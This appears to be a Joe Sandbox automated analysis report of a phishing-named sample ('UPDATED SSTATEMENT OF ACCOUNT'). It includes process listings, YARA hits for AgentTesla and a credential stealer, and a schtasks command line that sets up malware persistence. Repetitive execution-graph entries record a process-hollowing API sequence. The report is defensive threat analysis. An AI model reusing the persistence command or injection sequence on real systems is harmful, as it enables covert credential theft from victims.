                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 37%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:17:14:04
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff717f30000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:17:14:06
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"
                                            Imagebase:0x4b0000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:17:14:06
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:17:14:06
                                            Start date:19/04/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            Imagebase:0x520000
                                            File size:262'432 bytes
                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false


                                              Execution Graph

                                              Execution Coverage:12.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:273
                                              Total number of Limit Nodes:16

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0186D136
                                              • GetCurrentThread.KERNEL32 ref: 0186D173
                                              • GetCurrentProcess.KERNEL32 ref: 0186D1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 0186D209
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID: <3Z
                                              • API String ID: 2063062207-3925590025
                                              • Opcode ID: 57de9eb9d3d57087ebafbce64d8456d5cae07ab91bd45230a4d800858801097f
                                              • Instruction ID: 108ca3129468e166c17a251531a1a3f801011af60fc8a8e32a81657f33561c16
                                              • Opcode Fuzzy Hash: 57de9eb9d3d57087ebafbce64d8456d5cae07ab91bd45230a4d800858801097f
                                              • Instruction Fuzzy Hash: EE5175B0A01649CFDB14DFAAD548BDEBBF1EF88310F208559E109A7360DB346984CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0186D136
                                              • GetCurrentThread.KERNEL32 ref: 0186D173
                                              • GetCurrentProcess.KERNEL32 ref: 0186D1B0
                                              • GetCurrentThreadId.KERNEL32 ref: 0186D209
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID: <3Z
                                              • API String ID: 2063062207-3925590025
                                              • Opcode ID: 221e20f79a3b5a37706bcc22cc858be664e010d4be35cb3d0ea791befb7b41a9
                                              • Instruction ID: f6d8af04e96cf4d6fadacb94a000848beed30f12af6baf40cc81c141ca827c10
                                              • Opcode Fuzzy Hash: 221e20f79a3b5a37706bcc22cc858be664e010d4be35cb3d0ea791befb7b41a9
                                              • Instruction Fuzzy Hash: 325176B0A01649CFDB04DFAAD548B9EFBF5EF88310F208559E109B7360DB74A984CB65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01789766
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: <3Z$<3Z
                                              • API String ID: 963392458-2007775535
                                              • Opcode ID: e42725109e1b4a14fe24d74ce1a53a6234309900902c07ff921c410f1ded7ee3
                                              • Instruction ID: cc8889b453e31a8597b9cdb9c868e0ac0744198ab838f1cf0dba2fdf989a86d4
                                              • Opcode Fuzzy Hash: e42725109e1b4a14fe24d74ce1a53a6234309900902c07ff921c410f1ded7ee3
                                              • Instruction Fuzzy Hash: 0D914B71D00219DFEB20DF69C841BEDFBB2BF88318F1481A9E909A7240DB749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01789766
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: <3Z$<3Z
                                              • API String ID: 963392458-2007775535
                                              • Opcode ID: 7bdc394f69278b900f106edcb19b350f89790ac64ed81350093b687e3f053862
                                              • Instruction ID: 2ca73e9496e2fc989cc1d4d832e4d5442d38da3b1acaf24f818b26e684e02ca1
                                              • Opcode Fuzzy Hash: 7bdc394f69278b900f106edcb19b350f89790ac64ed81350093b687e3f053862
                                              • Instruction Fuzzy Hash: E0914A71D40259DFEB20DF68C841BEDFBB2BF88318F1481A9E909A7240DB749985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0186B086
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: <3Z
                                              • API String ID: 4139908857-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 186590c; graph contains the CreateActCtxA call (node/edge listing omitted)
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 018659C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID: <3Z
                                              • API String ID: 2289755597-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 186449c; graph contains the CreateActCtxA call (node/edge listing omitted)
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 018659C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID: <3Z
                                              • API String ID: 2289755597-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 17892a8; graph contains the WriteProcessMemory call (node/edge listing omitted)
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01789338
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: <3Z
                                              • API String ID: 3559483778-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 17892a7; graph contains the WriteProcessMemory call (node/edge listing omitted)
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 01789338
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: <3Z
                                              • API String ID: 3559483778-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 1789108; graph contains the Wow64SetThreadContext call (node/edge listing omitted)
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0178918E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: <3Z
                                              • API String ID: 983334009-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 186d2f9; graph contains the DuplicateHandle call (node/edge listing omitted)
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D387
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID: <3Z
                                              • API String ID: 3793708945-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 1789110; graph contains the Wow64SetThreadContext call (node/edge listing omitted)
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0178918E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: <3Z
                                              • API String ID: 983334009-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 1789398; graph contains the ReadProcessMemory call (node/edge listing omitted)
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 01789418
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID: <3Z
                                              • API String ID: 1726664587-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 1789397; graph contains the ReadProcessMemory call (node/edge listing omitted)
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 01789418
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID: <3Z
                                              • API String ID: 1726664587-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Function at 186d300; graph contains the DuplicateHandle call (node/edge listing omitted)
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0186D387
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID: <3Z
                                              • API String ID: 3793708945-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0186B086
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: <3Z
                                              • API String ID: 4139908857-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0186B101,00000800,00000000,00000000), ref: 0186B312
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: <3Z
                                              • API String ID: 1029625771-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0186B101,00000800,00000000,00000000), ref: 0186B312
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: <3Z
                                              • API String ID: 1029625771-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01789256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: <3Z
                                              • API String ID: 4275171209-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01789256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: <3Z
                                              • API String ID: 4275171209-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: <3Z
                                              • API String ID: 947044025-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: <3Z
                                              • API String ID: 947044025-3925590025
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: <3Z
                                              • API String ID: 947044025-3925590025
                                              • Opcode ID: f9aa89edb3da7653e82a1676eb49e121af53c1778dc674893e2bfd676685de19
                                              • Instruction ID: 9f4960d3eda5ec74f2181f91dd487d489c6d2d9545728d879a5c546c2cc8d796
                                              • Opcode Fuzzy Hash: f9aa89edb3da7653e82a1676eb49e121af53c1778dc674893e2bfd676685de19
                                              • Instruction Fuzzy Hash: 0B115571D002498FDB20DFAAC4457EEFBF4EF88724F24885AD519A7240CB79A905CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0186B086
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2140326402.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1860000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: <3Z
                                              • API String ID: 4139908857-3925590025
                                              • Opcode ID: 741e7ac5d076775b9ac51579ba18863da8508afd5e47d0ea589dc34349c58694
                                              • Instruction ID: 40a293a051e429df9eacdb69283c0f7c6c575b2df53dbc9147a65396ec3a42eb
                                              • Opcode Fuzzy Hash: 741e7ac5d076775b9ac51579ba18863da8508afd5e47d0ea589dc34349c58694
                                              • Instruction Fuzzy Hash: 881102B5D003498FDB10CF9AC444A9EFBF8AB88724F10845AD528A7210C379A645CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0178DF6D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID: <3Z
                                              • API String ID: 410705778-3925590025
                                              • Opcode ID: fe6f9fb2702298ce2481c0136265a500122ca866274da6e83117ca59ce2d149e
                                              • Instruction ID: 67e4128ca31c28a0d0a130f703fe5c4ebdda337bb3bb720d5ce138067ad1d428
                                              • Opcode Fuzzy Hash: fe6f9fb2702298ce2481c0136265a500122ca866274da6e83117ca59ce2d149e
                                              • Instruction Fuzzy Hash: 911103B5804349DFDB20DF9AD844BDEFBF8EB48720F10845AE918A7240C375A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc984597d670767dadc36ca76f6f6919d4d7790aa3f0812cbe18de264bd2af95
                                              • Instruction ID: 34eae1174505d6c5571ab42c2e299af94f20373499fe579eaa7d1edc333db372
                                              • Opcode Fuzzy Hash: dc984597d670767dadc36ca76f6f6919d4d7790aa3f0812cbe18de264bd2af95
                                              • Instruction Fuzzy Hash: 9A210672900240EFDF05DF54D9E0B27BFA5FB88718F24C56AD9050B2A6C336D456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8827ae680acf94dcadcf39c14ed110b287168168216aac58a5a8e8d531bcb24
                                              • Instruction ID: 12475c97446645b453fe7e11127a8e45cdfbbab49976fe00ac845b4f859bea17
                                              • Opcode Fuzzy Hash: b8827ae680acf94dcadcf39c14ed110b287168168216aac58a5a8e8d531bcb24
                                              • Instruction Fuzzy Hash: C821F472900204DFDF05DF94D9C0B56BFA5FB88324F24C17ED9090B2A6C336E456CAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7cf260496a8ab8c0a6c04de059f9b0dd991fb5ce68526982e87f012baa095e21
                                              • Instruction ID: f0d35f05c9187d15e96cd6017cc036735bc99f0a568b0e811fe74781bb0bb1ed
                                              • Opcode Fuzzy Hash: 7cf260496a8ab8c0a6c04de059f9b0dd991fb5ce68526982e87f012baa095e21
                                              • Instruction Fuzzy Hash: 572125B1904200DFDB15DF54D988B16BFE1FB88319F28C56ED90A0B366C336D407CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64f3c6c8b2c450ca6e0f2866a7021e0dc1b932f3f8ee7d234fe3d93fdcb042e6
                                              • Instruction ID: 5e967e628aa3fa8577a430f86520607cd94fe9dc79a1e553bcb878756eca49e1
                                              • Opcode Fuzzy Hash: 64f3c6c8b2c450ca6e0f2866a7021e0dc1b932f3f8ee7d234fe3d93fdcb042e6
                                              • Instruction Fuzzy Hash: C9213771904200EFDB01DF94D9C8B16BBE1FB88325F20C56ED9094B3A2C336D406CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11ea3c3ff1eef16fbe9255a0a0e9710a1d85e7eefad0c0ac6ecc9db8d91979d4
                                              • Instruction ID: 669540cfa0ffb0144c71c4a12b87b8f2326cd4fcc40190f943a978629f4cab04
                                              • Opcode Fuzzy Hash: 11ea3c3ff1eef16fbe9255a0a0e9710a1d85e7eefad0c0ac6ecc9db8d91979d4
                                              • Instruction Fuzzy Hash: 702183755093808FDB02CF64D594716BFB1EB46214F28C5DBD8498B267C33A980ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction ID: 10daf33f1ae2897d4088254945c3bcd26b2d76d4958ae81ac50c5095dabffaac
                                              • Opcode Fuzzy Hash: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction Fuzzy Hash: BC11CD72804280DFDF12CF44D9C0B56BF61FB84224F2482AAD8090B266C33AE456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138242115.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14dd000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction ID: 774744ea602dfb24424c4ac0d7734d68e4ffcff9687f7f1cc9744757788b2cba
                                              • Opcode Fuzzy Hash: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction Fuzzy Hash: B111DF72804280CFCF12CF54D9D0B16BF71FB84314F24C6AAD8090B266C33AD456CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2138341810.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14ed000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57e3e11dd54d086b93e848213dee2e5cd9da70134201e791e4ff5700e7437990
                                              • Instruction ID: ea77272cd17985ab895f28f12d3dee208de626a68345f9917454d6c007eddbea
                                              • Opcode Fuzzy Hash: 57e3e11dd54d086b93e848213dee2e5cd9da70134201e791e4ff5700e7437990
                                              • Instruction Fuzzy Hash: 1911BB75904280DFDB02CF54C5C4B16BBA1FB84224F24C6AAD8494B3A6C33AD40ACB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2139037276.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1780000_UPDATED SSTATEMENT OF ACCOUNT.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f88c503c5f12e6a95f85ecd62777f22d89ce2bb7ada8da4ceaffcd0ff745cd26
                                              • Instruction ID: ae317ed22c8c5830638ba1d74cb8b5fa820a5e5d3b142883a99c00a958ee516f
